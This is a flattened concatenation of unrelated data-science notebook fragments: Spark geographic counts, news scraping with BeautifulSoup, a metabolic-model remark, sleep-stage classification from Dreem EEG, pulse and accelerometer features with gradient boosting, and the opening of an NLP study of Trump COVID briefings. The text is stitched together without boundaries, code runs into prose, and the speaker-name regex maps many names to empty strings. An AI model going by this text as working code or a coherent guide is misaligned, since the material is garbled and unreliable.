geographical map. (COMPLEX: Can be done with Tableau, Plotly) Idea is to aggegate data using spark and then use Power BI to visualizeAssumption: Better way will be to have date/time wise geographical distribution of people, so considering datetimegeographical_counts = df.select(['Date_Time', 'lon', 'lat', 'id']).groupBy(['Date_Time', 'lon', 'lat']).agg(countDistinct('id').alias('people')).toPandas() geographical_counts.to_csv('geographical_counts.csv', index=False) geographical_counts.shapeWebscraping EDA , 17 September 2020# import basic ds packages import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns # importing packages for webscraping # following https://towardsdatascience.com/web-scraping-news-articles-in-python-9dd605799558 import requests from bs4 import BeautifulSoup import urllib.request,sys,time # get list of urls for initial tests urls = [ "https://www.wsj.com/articles/global-stock-markets-dow-update-9-17-2020-11600334220?mod=hp_lead_pos1", "https://www.theguardian.com/sport/2020/sep/17/andy-murray-backs-calls-to-remove-margaret-courts-name-from-tennis-arena", "https://www.foxnews.com/world/british-man-live-snake-face-mask-public-bus-photo", "https://www.cnn.com/2020/09/17/weather/storm-sally-thursday/index.html", ] # loop through URLs # following here: https://towardsdatascience.com/easily-scrape-and-summarize-news-articles-using-python-dfc7667d9e74 for ind, url in enumerate(urls): # get html content of url page = requests.get(url) coverpage = page.content # create soup object soup = BeautifulSoup(coverpage, 'html.parser') # get title headline = soup.find('h1').get_text() print(headline) print(' ') # get text from all

tags p_tags = soup.find_all('p') # get text from each p tag and strip whitespace p_tags_text = [tag.get_text().strip() for tag in p_tags] print(p_tags) print(' ') print(p_tags_text) print(' ') # get news text # coverpage_news = soup1.find_all('h2', class_='articulo-titulo') if ind == 2: break # coverpage # r1 page.status_code p_tags_text_1string = '' for p_tag_text in p_tags_text: p_tags_text_1string += p_tag_text print(p_tags_text_1string) p_tags_textThe three missing metabolites are not in the xml model at all. The two tentative cell mass pseudo-metabolites are not in the biomass reaction.If the -1000,1000 exchanges are used instead of those provided by the authors, then the model can grow. This indicates that an essential metabolite is missing form the input, or that secretion of a certain metabolite must be enabled.cb.io.save_json_model(m, 'iSR432_w_exch.json')Frequency aboive 100Hz are always null, we don't need the columnseeg.drop(columns=["eeg1_Above100Hz0", "eeg2_Above100Hz0", "eeg3_Above100Hz0", "eeg4_Above100Hz0"], inplace=True) df = pd.concat([eeg, acc, pulse, naif], axis=1) #training, test = np.split(df.sample(frac=1, random_state=42), [int(.8*len(df))]) training, test = train_test_split(df, test_size=0.2, random_state=42) X = training.iloc[:,:-1] y = training.iloc[:,-1] X_test = test.iloc[:,:-1] y_true = test.iloc[:,-1]Subdatat set: - naif - all butnaif.columns[:-1] Xbaseline = X.drop(columns=naif.columns[:-1], inplace=False) X_testbaseline = X_test.drop(columns=naif.columns[:-1], inplace=False) Xbaseline.head() L= list(eeg.columns) + list(acc.columns) + list(pulse.columns)#eeg.columns + acc.columns + pulse.columns Xnaif = X.drop(columns=L, inplace=False) X_testnaif = X_test.drop(columns=L, inplace=False) Xnaif.head() L= list(naif.columns[:-1]) + list(acc.columns) + list(pulse.columns) Xeeg = X.drop(columns=L, inplace=False) X_testeeg = X_test.drop(columns=L, inplace=False) Xeeg.head() L= list(naif.columns[:-1]) + list(acc.columns) + list(eeg.columns) Xpulse= X.drop(columns=L, inplace=False) X_testpulse = X_test.drop(columns=L, inplace=False) Xpulse.head() L= list(naif.columns[:-1]) + list(pulse.columns) + list(eeg.columns) Xacc= X.drop(columns=L, inplace=False) X_testacc = X_test.drop(columns=L, inplace=False) Xacc.head() def plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) fmt = '.2f' if normalize else 'd' thresh = cm.max() / 2. for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, format(cm[i, j], fmt), horizontalalignment="center", color="white" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') Xpulse.columnspulse only With only ir sensorkappa = 0.260accuracy = 0.473with both ir and r sensorfor n_estimators= 40- log loss = 1.131- kappa = 0.324- accuracy = 0.537gbc = GradientBoostingClassifier(n_estimators = 30, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [8, 10, 13] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.7]} ck_score = make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(Xpulse,y) print(grid_fitted.best_params_) y_pred = grid.predict(X_testpulse) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) errors = [] Lk = [] La = [] r = range(10, 100 , 10) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 13, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.7) gbc.fit(Xpulse, y) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) errors.append(ll) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go for n estimators = 40errors = [] Lk = [] La = [] i=40 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 13, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(Xpulse, y) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xpulse.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)r and ir feature have comparable importancelow_r = Xpulse[Xpulse.BPMlessthan30_r!=0] low_r.shape low_r[low_r.BPMlessthan30_ir!=0].shape1113 rows with BPM less than 30 for both sensors(error measures ) filtering out for learning rows with less than 30 BPM for both sensorswhen filtering the training set out of rows with BPM less than 30 bpm, for n_estimators= 30, get following performance- kappa = 0.324- accuracy = 0.537to be compared with performance without filtering- kappa = 0.324- accuracy = 0.537No performance gain from filtering outXpulseF = Xpulse[Xpulse.BPMlessthan30_r==0][Xpulse.BPMlessthan30_ir==0] XpulseF.shape yF= y[XpulseF.index] yF.shape np.all(yF.index == XpulseF.index) gbc = GradientBoostingClassifier(n_estimators = 30, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [5, 10, 13] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.7]} ck_score = make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(XpulseF,yF) print(grid_fitted.best_params_) y_pred = grid.predict(X_testpulse) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 13, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(XpulseF, yF) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) errors.append(ll) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go with 30errors = [] Lk = [] La = [] i=30 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(XpulseF, yF) ll = log_loss(y_true, gbc.predict_proba(X_testpulse)) y_pred = gbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xpulse.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(30)Pulse amplitude- non shuffle folds- work with XGboost instead of gbm. (gbm kappa = 0.324 with suffle and gbm)pulseAmp = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_ampTrain.csv') pulseAmp = pulseAmp.iloc[:, 1:] dataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") Y = trainOutput["label"]reestablishing reference for pulse with Xgboost and non suffle floodpulse = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_featuresTrain.csv') pulse = pulse.iloc[:, 1:] df = pulse df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xpulse = train.iloc[:,:-1] y = train.iloc[:,-1] X_testpulse = test.iloc[:,:-1] y_true = test.iloc[:,-1] #L= list(naif.columns[:-1]) + list(acc.columns) + list(eeg.columns) #Xpulse= X.drop(columns=L, inplace=False) #X_testpulse = X_test.drop(columns=L, inplace=False) Xpulse.columns pulseAmp.columns y_true.unique() %%time errors = [] Lk = [] La = [] r = range(10, 100, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xpulse, y) ll = log_loss(y_true, xbc.predict_proba(X_testpulse)) errors.append(ll) y_pred = xbc.predict(X_testpulse) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show()Pulse AmplitudedataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") Y = trainOutput["label"] pulseAmp = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_ampTrain.csv') pulseAmp = pulseAmp.iloc[:, 1:] pulse.columns dfa = pulseAmp dfa["Y"] = trainOutput["label"] trainA = dfa.iloc[0:int(df.shape[0]*0.8), :] testA = dfa.iloc[int(df.shape[0]*0.8):, :] Xa = trainA.iloc[:,:-1] ya = trainA.iloc[:,-1] Xa_test = testA.iloc[:,:-1] ya_true = testA.iloc[:,-1] %%time errors = [] Lk = [] La = [] r = range(10, 110, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xa, y) ll = log_loss(y_true, xbc.predict_proba(Xa_test)) errors.append(ll) y_pred = xbc.predict(Xa_test) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show() print(Xa.index) print(Xpulse.index) Xap= pd.concat([Xa, Xpulse], axis = 1) Xap_test = pd.concat([Xa_test, X_testpulse], axis = 1) %%time errors = [] Lk = [] La = [] r = range(10, 110, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xap, y) ll = log_loss(y_true, xbc.predict_proba(Xap_test)) errors.append(ll) y_pred = xbc.predict(Xap_test) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show() importances = xbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xap.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)accelerometer- kappa = 0.20032681770992822- accuracy = 0.45550992470910334gbc = GradientBoostingClassifier(n_estimators = 100, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [5, 10, 15] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.6, 0.8, 1.0]} ck_score = make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(Xacc,y) print(grid_fitted.best_params_) y_pred = grid.predict(X_testacc) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) errors = [] Lk = [] La = [] r = range(10, 200 , 10) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 5, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(Xacc, y) ll = log_loss(y_true, gbc.predict_proba(X_testacc)) errors.append(ll) y_pred = gbc.predict(X_testacc) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go for - n_estimators= 60- log loss = 1.23084271494082- kappa = 0.20032681770992822- accuracy = 0.45550992470910334errors = [] Lk = [] La = [] i=60 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 5, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.8) gbc.fit(Xacc, y) ll = log_loss(y_true, gbc.predict_proba(X_testacc)) y_pred = gbc.predict(X_testacc) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xacc.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)EEG - for n_estimators= 50- log loss = 0.643- kappa = 0.677- accuracy = 0.770gbc = GradientBoostingClassifier(n_estimators = 100, random_state=42) r1 = [1] r2 = [2] parametres = {'max_depth': [5, 10, 15] ,'learning_rate': [0.1], "min_samples_leaf" : r1, "min_samples_split" : r2, 'subsample': [0.6, 0.8, 1.0]} ck_score = make_scorer(cohen_kappa_score) grid = GridSearchCV(estimator=gbc, param_grid=parametres, scoring=ck_score, n_jobs=-1, verbose=2) grid_fitted = grid.fit(Xeeg,y) print(grid_fitted.best_params_) y_pred = grid.predict(X_testeeg) print("kappa: ", cohen_kappa_score(y_true, y_pred)) print("accurancy for n_estimators = " , accuracy_score(y_true, y_pred)) errors = [] Lk = [] La = [] r = range(10, 120 , 10) for i in r: gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.6) gbc.fit(Xeeg, y) ll = log_loss(y_true, gbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = gbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.plot(r, La, label = "accuracy") plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right')go for n estimators = 50errors = [] Lk = [] La = [] i=50 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.6) gbc.fit(Xeeg, y) ll = log_loss(y_true, gbc.predict_proba(X_testeeg)) y_pred = gbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) cnf_matrix = confusion_matrix(y_true, y_pred) np.set_printoptions(precision=2) plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], title='Confusion matrix, without normalization') plt.figure() plot_confusion_matrix(cnf_matrix, classes=[0, 1, 2, 3, 4], normalize=True, title='Normalized confusion matrix') plt.show() importances = gbc.feature_importances_ feature_importances = pd.DataFrame(importances, index = Xeeg.columns, columns=['importance']).sort_values('importance', ascending=False) plt.bar(feature_importances.index, feature_importances["importance"]) plt.show() feature_importances.head(50)EEG 2fourrier transformation on 2 seconds instead of 30 secWe run gradien boosting with same parameters than EEG 30.We get- for n_estimators= 50- log loss = 0.643- kappa = 0.663- accuracy = 0.763to be compared with EEG 30 - for n_estimators= 50- log loss = 0.643- kappa = 0.677- accuracy = 0.770so it is slightly less good !eeg = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\spectrogram_eeg_features2Train.xlsx') for i in range(15): eeg.drop(columns=["eeg1_Above100Hz"+str(i), "eeg2_Above100Hz"+str(i), "eeg3_Above100Hz"+str(i), "eeg4_Above100Hz"+str(i)], inplace=True) naif = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\featuresTrain.xlsx') acc = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\acc_featuresTrain.xlsx') pulse = pd.read_csv('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\pulse_featuresTrain.csv') df = pd.concat([eeg, acc, pulse, naif], axis=1) training, test = train_test_split(df, test_size=0.2, random_state=42) X = training.iloc[:,:-1] y = training.iloc[:,-1] X_test = test.iloc[:,:-1] y_true = test.iloc[:,-1] L= list(naif.columns[:-1]) + list(acc.columns) + list(pulse.columns) Xeeg = X.drop(columns=L, inplace=False) X_testeeg = X_test.drop(columns=L, inplace=False) X_testeeg.head() i=50 gbc = GradientBoostingClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 15, min_samples_leaf= 1, min_samples_split= 2, subsample= 0.6) gbc.fit(Xeeg, y) ll = log_loss(y_true, gbc.predict_proba(X_testeeg)) y_pred = gbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("for n_estimators= ", i) print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a)for n_estimators= 50 log loss = 0.6425063126769058 kappa = 0.6627738572503876 accuracy = 0.7627195984485512EEG with xgboost and non shuffle folddataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" eeg = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\spectrogram_eeg_features30Train.xlsx') trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") eeg.drop(columns=["eeg1_Above100Hz0", "eeg2_Above100Hz0", "eeg3_Above100Hz0", "eeg4_Above100Hz0"], inplace=True) df = eeg df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xeeg = train.iloc[:,:-1] y = train.iloc[:,-1] X_testeeg = test.iloc[:,:-1] y_true = test.iloc[:,-1] print(y.unique()) Xeeg.columns %%time errors = [] Lk = [] La = [] r = range(30, 210, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xeeg, y) ll = log_loss(y_true, xbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = xbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show()trying with decibel (log)- might be a tiny bit better but it could be luckdf = np.log10(eeg) df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xeeg = train.iloc[:,:-1] y = train.iloc[:,-1] X_testeeg = test.iloc[:,:-1] y_true = test.iloc[:,-1] %%time errors = [] Lk = [] La = [] r = range(30, 210, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xeeg, y) ll = log_loss(y_true, xbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = xbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show() #### adding power sum dataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" eeg = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\spectrogram_eeg_features30Train.xlsx') trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") eeg.drop(columns=["eeg1_Above100Hz0", "eeg2_Above100Hz0", "eeg3_Above100Hz0", "eeg4_Above100Hz0"], inplace=True) df = eeg df['eeg_energy']= eeg.sum(axis=1) #df['eeg1_energy'] = eeg.loc[:, 'eeg1_Delta0':'eeg1_Gamma0'].sum(axis=1) #df['eeg2_energy'] = eeg.loc[:, 'eeg2_Delta0':'eeg2_Gamma0'].sum(axis=1) #df['eeg3_energy'] = eeg.loc[:, 'eeg3_Delta0':'eeg3_Gamma0'].sum(axis=1) #df['eeg4_energy'] = eeg.loc[:, 'eeg4_Delta0':'eeg4_Gamma0'].sum(axis=1) eeg.loc[:, 'eeg1_Delta0':'eeg1_Gamma0'].columns df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xeeg = train.iloc[:,:-1] y = train.iloc[:,-1] X_testeeg = test.iloc[:,:-1] y_true = test.iloc[:,-1] %%time # with energy per captors #log loss = 0.7856534234256973 #kappa = 0.5922992953360089 #with sum of energy of the captors #log loss = 0.7822896453321189 #kappa = 0.5992079234528738 errors = [] Lk = [] La = [] r = range(30, 160, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xeeg, y) ll = log_loss(y_true, xbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = xbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show()Exploring President Trump's Coronavirus Task Force Briefings with Emotion Analysis and Topic Modelling![](../imgs/trump_task_force.jpg)Given the controversy over the Trump administration's [daily briefings](https://www.nytimes.com/2020/04/09/us/politics/trump-coronavirus-press-briefing.html?referringSource=articleShare) and overall [handling of the COVID-19 pandemic](https://www.nytimes.com/2020/04/14/us/politics/coronavirus-trump-who-funding.html), I thought it would be interesting to apply some of the basic NLP techniques I recently learned to explore this timely, readily available body of text. The analysis below examines all of the White House's task force briefings held from February 26th to April 27th 2020. Scraping Briefing TranscriptsAlthough the briefing transcripts are available on [rev.com](https://www.rev.com) in formatted `.txt` files, I wanted to practice using [BeautifulSoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) for web scraping as part of this project. The scraped transcripts are included [here](https://github.com/brendoncampbell/corona-briefing-tones/blob/master/data/all_briefings.csv), and [`scrape_briefings.py`](https://github.com/brendoncampbell/corona-briefing-tones/blob/master/src/scrape_briefings.py) can be run to rescrape them.After reading in this relatively clean CSV, we have a simple dataframe containing chronological paragraphs of speech `text` along with the corresponding `date`, `timestamp` and `speaker`:import pandas as pd import numpy as np import altair as alt alt.renderers.enable('png') # import scraped csv to pandas df briefings_df = pd.read_csv('../data/all_briefings.csv') briefings_dfNull ValuesChecking for null values, we can see there are actually only three missing `text` values in the near 10,000 rows.briefings_df[briefings_df['text'].isnull()]A quick look at the full transcripts and video recordings confirms these correspond to the speaker interjecting, being cut off, or uttering something inaudible. For the purpose of this analysis, let's simply drop these:briefings_df = briefings_df.dropna(subset=['text']).reset_index(drop=True)Cleaning Up Speaker NamesChecking the names of the most frequent speakers, we see a few opportunities to clean up this column before moving on to preprocessing.1. Unnamed speakers identified by a number (i.e. `Speaker 12`) are reset for each briefing, and therefore don't map to the same person.2. President Trump and some of the other key task force members are referenced by multiple names (``, `Dr. `).3. There are a handful of male reporters (John, Jeff, Jim, Peter, and Steve) frequently called upon by their first name.# how many paragraphs of text for the top speakers? briefings_df['speaker'].value_counts()[:40]Let's consolidate these so we have consistent speaker names and group the unnamed speakers under a single name:# replace speaker names using basic regex briefings_df['speaker'].replace(regex={r'.*Trump.*': '', r'.*Pence.*': '', r'.*Fauci.*': 'Dr. ', r'.*Birx.*': 'Dr. ', r'.*Berks.*': 'Dr. Deborah Birx', r'.*Pompeo.*': '', r'.*Report.*': 'Unnamed (Reporter)', r'.*Audience Member.*': 'Unnamed', r'.*Speaker .*': 'Unnamed', r'.*Jeff\Z': 'Jeff (Reporter)', r'.*John\Z': 'John (Reporter)', r'.*Peter\Z': 'Peter (Reporter)', r'.*Jim\Z': 'Jim (Reporter)', r'.*Steve\Z': 'Steve (Reporter)', r'.*Pete\Z': '', r'.*Novarro.*': '', r'.*Surgeon General.*': '', r'.*Giroir.*': '', r'.*Polowczyk.*': '', r'.*Verma.*': '', r'.*Azar.*': '', r'.*Hahn.*': 'Dr. ', r'.*Mnuchin.*': ''}, inplace = True) briefings_df['speaker'].value_counts()[:20]Preprocessing Text Language is inherently unstructured compared to most types of data, so we need to preprocess the text before moving onto analysis. We will carry out this preprocessing and normalize things somewhat using the [spaCy](https://spacy.io) package:1. Convert text to lower-case2. Tokenize (identify word boundaries and split text)3. Remove stop words (frequently-occurring English words that don't tend to be useful for analysis)4. Lemmatize (convert words to their base form: spreading → spread)5. Exclude irrelevant tokens such as emails, URLS and unimportant parts of speech (i.e. pronouns, conjunctions, punctuation)import spacy from pandarallel import pandarallel import re # Load English spaCy model and stop words nlp = spacy.load("en_core_web_sm") from spacy.lang.en.stop_words import STOP_WORDS # function for preprocessing each paragraph of transcript text def preprocess(text, min_token_len = 2, irrelevant_pos = ['ADV','PRON','CCONJ','PUNCT','PART','DET','ADP','SPACE']): """ Carry 